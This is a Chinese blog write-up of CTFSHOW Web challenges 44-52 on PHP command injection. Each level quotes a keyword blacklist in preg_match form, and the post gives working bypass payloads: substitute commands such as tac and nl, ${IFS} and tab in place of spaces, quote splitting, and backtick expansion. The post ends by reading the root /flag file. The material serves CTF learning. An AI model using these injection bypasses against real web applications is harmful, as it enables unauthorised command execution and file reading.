CTFSHOW Web入门 44-52

最新推荐文章于 2024-06-10 14:41:52 发布
最新推荐文章于 2024-06-10 14:41:52 发布
阅读量437 收藏
点赞数
分类专栏: CTFSHOW 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50936156/article/details/112998848
版权

目录

web 44

if(!preg_match("/;|cat|flag/i", $c))
{system($c." >/dev/null 2>&1");

这题过滤了cat,flag
关于cat的过滤绕过可以用以下命令来替换
cat file1 从第一个字节开始正向查看文件的内容
tac file1 从最后一行开始反向查看一个文件的内容
more file1 查看一个长文件的内容
less file1 类似于 ‘more’ 命令,但是它允许在文件中和正向操作一样的反向操作
head file1 查看一个文件
tail file1 查看一个文件
awk file1 查看一个文件
sort file1 将文件的每一行作为一个单位,相互比较,比较原则是从首字符向后,依次按ASCII码值进行比较,最后将他们按升序输出。
nl file1 可以将输出的文件内容自动的加上行号

也可以用单双引号,通配符,拼接等方式绕过
关于flag的过滤可以用单双引号,通配符绕过,也利用反引号·ls·直接将全部文件抓取

playload:?c=tac `ls`||

web 45

if(!preg_match("/\;|cat|flag| /i", $c)){
        system($c." >/dev/null 2>&1"); }

多过滤了空格
空格可以用以下方法替代
${IFS}
<>
%09等

playload:?c=tac%09`ls`||

web 46

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c))
{system($c." >/dev/null 2>&1");}

多过滤了数字,$,*
空格可以用<>替代,但不可以再用ls了,因为<,>这两个是重定向的输入输出,与ls一起会将结果给模糊了,从而操作失败。所以改用单双引号绕过
这边有重定向的详解链接

playload:?c=tac<>fl''ag.php||

web 47

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c))
{   system($c." >/dev/null 2>&1"); }

多过滤了几个命令,但nl,awk,tac没被过滤
可以继续用

playload:?c=nl<>fl''ag.php||

web 48

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
        system($c." >/dev/null 2>&1");
    }

好家伙,这里可以带上小本本,记笔记。把这些被过滤的记下来,万一以后有哪天哪题没过滤这些,不就秒了(狗头)
同web48,要不nl 要不单双引,拼接等绕过

playload:?c=nl<>fl''ag.php||

web 49

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){
        system($c." >/dev/null 2>&1");

多过滤了%
playload同上

web 50

    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }

多过滤了%09( ),%26("),问题不大
playload同web49

web 51

    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }

多过滤了tac,问题不大用

playload:?c=nl<>fl''ag.php||

web 52

if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c." >/dev/null 2>&1");

多过滤了<>,空格可以用${IFS}替代
然后同上,但得到一个虚假的flag,
然后进行查找文件,最后在根目录下找到了flag文件

?c=ls${IFS}/||//查找根目录下文件
bin dev etc flag home lib media mnt opt proc root run sbin srv sys tmp usr var 
playload:?c=nl${IFS}/fl''ag||
N0zer
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow 命令执行 web52
Kradress的博客
11-20 1088
目录源码知识点题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 22:50:30 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web52(命令执行)
m0_62094846的博客
01-28 597
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 22:50:30 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c=$_GET['c']; .
ctfshow-web入门-命令执行(web43-web52)关于黑洞“ >/dev/null 2>&1“的处理与绕过
最新发布
Welcome To Myon'Blog !
06-10 1053
注意:我们传入的 c=%09 是 URL 编码,在 URL 编码中,%09 表示 ASCII 编码中的水平制表符(Tab 键),而不是数字 '0' 和 '9'。拿到 flag:ctfshow{f0f59065-df11-4cec-b502-fc9a7e2c48c8}拿到 flag:ctfshow{27fb4c37-7767-412f-9389-0d90b5a9a361}拿到 flag:ctfshow{f043c560-aaea-4e22-9072-e6a5eb08d059}cut:用于从文本文件中剪切列。
ctfshow命令执行(web29-web52)
m0_72125469的博客
01-19 1736
ctfshowweb29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 web43 web44 web45 web46 web47 web48 web49 web50 web51 web52 web53 web54 web55
ctfshow web入门 命令执行:52-54
rawrecruit的博客
04-03 1677
ctfshow web入门 命令执行篇的个人刷题记录。
ctfshow-Web入门-42~52wp(命令执行)
yutianovo的博客
09-06 1495
Web42 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 20:51:55 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c=$_GET['
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFshow web入门 web41~web55 命令执行
qq_56815564的博客
04-15 1413
这回是真正意义上的禁用了这些命令了,以前还能通过中间添加一些特殊符号来绕过的,现在是完全不能使用了,毕竟 . 后面跟上一个通配符后,就完全不能在中间加点什么了。简单分析一下,if中的语句第一个是输出GET传入的参数、第二个是执行c的语句后得到的东西赋值给d、第三个是换行后在输出d的内容。但是留下了一个一个或运算符( | )空格不能用可以使用tab键代替,url编码是%09,反正tab是最多是4个空格,多几个空格也不会怎样。说到底,这么多能有回显的函数,也不差cat这一个,形式有这么多,也不差分号这一个。
CTFshow web(29-51) 命令执行
qq_37561898的博客
01-21 943
CTF,ctfshow,命令执行
正则\绕过
nigo134的博客
07-27 470
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) { echo("forbid ~");.
EasyBypass (;管道符)
qq_62046696的博客
12-23 1268
肯定要把file从命令中注释掉这种,以前接触过闭合然后自己重新构造一个🐎,但是这里好像管道符也可以使用;这样就成功闭合掉了,然后其实还有一个疑问就是我cat /f*的时候也能用,可是|\*|\。这个也就是给传入的参数加了一个引号包起来,然后往上继续查看过滤的字符号剩下什么。如果是 新生类的话,system那里应该换为 new a(b)这种的形式,分号还有,并且tac也没 过滤,flag被过滤掉了但是可以用?报错了查看信息是引号的问题,我们还需要闭合掉引号不然就变成了。就需要我们自己写入闭合。
CTFshow命令执行29-123
qq_43534481的博客
08-06 1439
CTFshow命令执行WP
ctfshow命令执行(web29-web56)第一部分
qq_63928796的博客
10-05 1686
过滤了flag可以用*或者?绕过。
SHCTF-WEB
m0_68113265的博客
10-05 70
第二个preg_match可以回溯次数超过一百万次绕过。先unicode解码接着base64解码得flag。第一个preg_match可以数组绕过num[]preg_replace函数/e下的任意代码执行。bp爆破出,账号amdin密码password。main.js中unicode代码。
ctfshow web入门 web11
12-12
根据提供的引用内容,我们可以得知ctfshow web入门系列共有20道题目,其中web11是其中的一道题目。由于没有提供具体的题目描述,我无法给出具体的解答。但是,我可以为您提供一些解决CTF Web题目的一般性建议: 1....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值